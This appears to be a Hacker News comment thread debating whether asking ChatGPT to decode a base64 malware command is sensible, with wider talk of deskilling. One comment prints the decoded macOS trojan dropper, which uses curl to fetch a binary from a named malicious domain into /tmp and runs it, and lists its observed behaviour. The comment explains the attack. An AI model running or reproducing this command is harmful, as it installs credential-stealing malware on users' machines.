mort96
8 hours ago
Why would you ask ChatGPT to tell you what a base64-encoded string is? Just base64 decode it! This blog post's "investigation" is worthless when it's just copy/pasting what a chat bot said. There is no reason to rely on a chat bot for this.
drweevil
an hour ago
There is a (temporary) misalignment of incentives. ChatGPT is cheap--for now. But it cannot remain so for long. Someone(s) will have to pay for those huge datacenters and the gigawatts of power they require, and the investors speculating on them.
BeFlatXIII
7 minutes ago
I hope it's the investors who end up paying because customers are too cheap.
jb1991
7 hours ago
You are forgetting the world we live in now where, as time passes, fewer and fewer people will know how to do anything on their own and more and more will only accomplish things by using AI.
account42
4 hours ago
And we should call out and shame that behavior wherever we can just like our teachers were not amused when we simply copied from a Wikipedia article instead of following the referenced sources.
DocTomoe
7 hours ago
As a kid who was raised editing and tinkering memory blocks out of CONFIG.SYS, I've been watching this for a while when the GenZ-Mobile-Generation showed up and was not able to do the darnest things. I see with terror in my heart that the downward ride isn't yet over.
somenameforme
5 hours ago
And it's little brother, autoexec.bat! The thing I found most bemusing through all of this is people insisting that people growing up with tech would somehow have this deep intuitive understanding of it. It made no sense. Using tech doesn't somehow make you aware of how it works. If anything, the refined final product can end up hiding it from people.
We all use elevators but know basically nothing about them -- hence the countless nonsense Hollywood scenes with a cut elevator cable (spoiler: you'd be fine). By contrast when they were first being introduced, every single person that rode on an elevator was probably quit well aware of the tension brake systems and other redundancies - because otherwise, stepping foot in one would feel insane. But when you grow up with them and take everything for granted, hey who cares - it works, yeah?
account42
4 hours ago
People growing up with personal computers did get that intuitive understanding for the most part. The problem is that zoomers and gen alpha are now growing up with idiot proofed appliances that hide all the details from them instead.
somenameforme
2 hours ago
I'd argue a bigger part is the endless entertainment. A big part of the reason I started tinkering with things is because I was bored, and I'm fairly certain that was a very common motivator.
At Half Price Books I picked up a book on assembler and started writing my first code using debug.com simply because of boredom. In an era where I could have instead been watching endless entertaining videos on any subject imaginable, or playing literally free video games optimized for thousands of hours of entertainment? I'd certainly have never been bored, and I'm not sure I'd have ever even gotten into computers (or anything for that matter). Indeed a disproportionately large number of zoomers seem to have no skills whatsoever, and that's going to be a major issue for humanity moving forward.
jb1991
7 hours ago
The steepest part of the slope has just started.
closewith
5 hours ago
Can you grow your own food? Treat your own injuries? Build your own shelter? Repair your own appliances?
If not, you're already much farther down this dependency funnel that you believe.
JohnFen
32 minutes ago
Yes, to all of the above. So can a lot of the people I know.
DocTomoe
an hour ago
Matter of fact, I can, and have done, all of these things. Recreationally.
The idea is not to be hypergeneralist. What I observe - subjectively - is that we are losing whole generations of what used to be the 'nerdy IT/ham-radio/electronics-folks'. Sure, there is a small remnants with the makerscene, but that's mostly older people (beginning in their late teens).d
anthk
6 hours ago
Gen-Z people without AI (AWS' downtime for sure put tons of vibe coders/vibe sysadmins in their place) will be doomed. Mark my words.
I didn't grow by editing DOS config files, but I began with it in Elementary and I've got Debian Woody (later Sarge) in my late HS teen years. OFC I played with game emulators, settings, optimizations, a lot, and under GNU/Linux I even tweaked some BTTV drivers for some El Cheapo TV Tuner. The amount of thinkering these people had omitted because of smartphones and such it's huge.
bofadeez
7 hours ago
Yeah it's interesting. What's the incentive to spend 10 years learning tedious stuff anymore? In another 1-2 generations all non AI knowledge will be gone.
account42
4 hours ago
https://en.wikipedia.org/wiki/Echoborg
I am (not) looking forward to a future where people are unable to perform the simplest tasks because their digital brain has an outage and they have forgotten how to think for themselves.
bandrami
7 hours ago
It was almost 10 years ago that somebody asked if there's a way to do a diff of two files if they aren't both in git.
freetonik
6 hours ago
I was a guest lecturer at a university, and got a glimpse of a staff meeting about the problem of plagiarism (in code assignments). It was a surprise to them when I asked "why wouldn't you use something like diff for obvious cases?". None of the computer engineering lecturers knew about diff.
snailmailman
6 hours ago
these AI services also won't really distinguish between "user input" and "malicious input that the user is asking about".
Obviously the input here was only designed to be run in a terminal, but if it was some sort of prompt injection attack instead, the AI might not simply decode the base64, it might do something else.
bmicraft
4 hours ago
It could even conceivably be both
meander_water
7 hours ago
Yeah I was hoping to see the actual script content
guessmyname
7 hours ago
Here you go, fellow netizen:
echo -n 'Y3VybCAtc0wgLW8gL3RtcC9wakttTVVGRVl2OEFsZktSIGh0dHB
zOi8vd3d3LmFtYW5hZ2VuY2llcy5jb20vYXNzZXRzL2pzL2dyZWNhcHRja
GE7IGNobW9kICt4IC90bXAvcGpLbU1VRkVZdjhBbGZLUjsgL3RtcC9wakt
tTVVGRVl2OEFsZktS' | base64 --decode
curl -sL -o /tmp/pjKmMUFEYv8AlfKR https://www.amanagencies.com/assets/js/grecaptcha; chmod +x /tmp/pjKmMUFEYv8AlfKR; /tmp/pjKmMUFEYv8AlfKR
$ curl -o foo.bar "URL"
$ file ~/Downloads/foo.bar
foo.bar: Mach-O universal binary with 2 architectures:
[x86_64:Mach-O 64-bit executable x86_64 - Mach-O 64-bit executable x86_64]
[arm64:Mach-O 64-bit executable arm64 - Mach-O 64-bit executable arm64]
foo.bar (for architecture x86_64): Mach-O 64-bit executable x86_64
foo.bar (for architecture arm64): Mach-O 64-bit executable arm64
Reading through the VirusTotal Behavior page, I can see that the Trojan…
• Sends a POST request with 18 bytes to http://83.219.248.194/fulfulde.php, which then returns a text/html page
• Then, it sends DNS queries to h3.apis.apple.map.fastly.net (or maybe this is macOS itself)
• Then, it triggers several open(2) syscalls, among which I can see Mail.app and Messages.app
• Then, it uses a seemingly innocuous binary called “~/.local-6FFD23F2-D3F2-52AC-8572-1D7B854F8BC7/GoogleUpdater” along with “~/Desktop/sample”
• Then, launches a process (via macOS Lauch Agents) called “com.google.captchasvc”
• Then, uses AppleScript to launch a dialog window with this message “macOS needs to access System Settings.Please enter password for root:”
After this I assume it’s game over.
TrendMicro analysis (Sep 04, 2025) -- https://www.trendmicro.com/en_us/research/25/i/an-mdr-analys...
radu_floricica
7 hours ago
"Why use a calculator all the time? Just use pen and paper!"
ChatGPT is the right tool here, because it does the job, and it's more versatile. And underneath the hood it most likely called a decoder anyways.
freetonik
6 hours ago
There is no guarantee ChatGPT did the correct thing. There may be no indication whatsoever. This is not like comparing pen&paper to a calculator, it's more like comparing pen&paper to "calling a random, allegedly smart person on the phone".
alt187
4 hours ago
> "Why use a calculator all the time? Just use pen and paper!"
"Why use a calculator all the time? Just use ChatGPT!"
Maybe you want to be an helpless baby who can't do anything and needs to chug a bajillion liters of water and depend on OpenAI to decode base64, but the thought of this becoming the norm understandably upsets reasonable people.
Anthony-G
2 hours ago
In addition to the other responses, ChatGPT is more wasteful and uses a lot more computing power than a locally run Base 64 decoder. When masses of people use LLMs for such trivial calculations, the environmental cost adds up.
JohnFen
28 minutes ago
genAI is unreliable. For a task like this, reliability is pretty important.
63stack
5 hours ago
ChatGPT failed at doing the job, and it was the wrong tool to use.
It explained that it saves a file and executes it. That's a nothingburger, it was obvious it's going to execute some code.
The actual value would have been showing what's in the executed file, but of course it didn't show that (since that would have required actually executing the code).
Showing the contents of the file would have provided an exact and accurate information on what the malware is trying to do. ChatGPT gave a vague "it executes some code".
og_kalu
an hour ago
So what exactly did it fail at here ? Not executing the clear malware attack just so it could it see what was inside ? Really ?
radu_floricica
5 hours ago
To most of the replies to my comment, the point is that:
- ChatGPT is _satisficing_, not optimal. It's definitely worse than a dedicated decoder tool.
- and it's also much more versatile, so it will be satisficing a large array of tasks.
So in scenarios where precision isn't critical and the stakes are mid, it'll simply become the default tool.
Like googling something instead of checking out wikipedia. Or checking out wikipedia instead of using those mythical primary sources. etc.
justinclift
4 hours ago
> ChatGPT is _satisficing_, not optimal.
But is it _always_ accurate?
The answer to that is important when there are security implications.
mort96
7 hours ago
Nah this is more like, "Why do you consult the vibes oracle to compute 7 * 5? Just use a calculator!"
.. which is, to be honest, a criticism I would make if I saw someone try to ask ChatGPT to do math
.. and, FWIW, that is exactly what's happening here; base64 decode is just math
Freak_NL
5 hours ago
For 7 × 5 using a calculator should not even be a thing for most people. Sure, some people just can't do the basic tables, but most people should be able to tell how much seven €5 items cost in a supermarket. If you could do this as a teenager, but lost that skill afterwards, you are just sacrificing your brain.
mort96
4 hours ago
Yes I thought about that after writing it and should've used an example with bigger numbers. But I didn't want to ninja edit too much. I think the point came across.
miki123211
6 hours ago
> if I saw someone try to ask ChatGPT to do math
This makes me wonder how many kids are using Chat GPT as a calculator.
dwroberts
5 hours ago
What are you talking about? How is it the right tool? You have a command you can use instead that will give back the exact answer, immediately, with no possibility of mistakes or hallucination
rs186
3 hours ago
That's a terrible analogy.
johnisgood
7 hours ago
I mean some people asked what "cat" is, then I remembered there was a time when I had no idea how to use mIRC, so whatever. In my defense though, I was REALLY young.
kace91
6 hours ago
>In my defense though, I was REALLY young.
No need to apologize, needing an excuse to lack knowledge is how we end up with people afraid to ask.
I try to make it visible when I’m among juniors and there’s something I don’t know. I think showing the process of “I realize I miss some knowledge => here’s how I bridge the gap” might help against the current trend of going through the motions in the dark.
It used to be that learning was almost a hazing ritual of being belittled and told to RTFM. That doesn’t really work when people have a big bold shortcut on their phones at any given time.
We might need to make the old way more attractive if we don’t want to end up alone.
JohnFen
23 minutes ago
> No need to apologize, needing an excuse to lack knowledge is how we end up with people afraid to ask.
Yes!
There is no shame in ignorance. We are all, without exception, ignorant of more things than we're knowledgeable about. Shame should be reserved for remaining ignorant of things when it becomes clear that we would benefit from learning about them.
johnisgood
6 hours ago
> needing an excuse to lack knowledge is how we end up with people afraid to ask.
While we should encourage people to ask questions without fear, this doesn't mean we should lower standards or simplify everything for the lowest common denominator (which seems to be trending a lot!).
That said, there is the real issue of "this must stay complex because that's how it really is" as well, undeniably so.
> It used to be that learning was almost a hazing ritual of being belittled and told to RTFM.
Been there! I think it did more good than bad to me though. Survivorship bias? In any case, I don't try to make the case here that it is optimal pedagogy. I wouldn't know. Thoughts?
Zobat
5 hours ago
Totally agree, try to never be afraid or embarrassed of not knowing.
prasadjoglekar
5 hours ago
Easy, quick sandbox.
mort96
4 hours ago
What attack vector does it protect against that pasting the string into an online base64 decoder web app doesn't also protect against?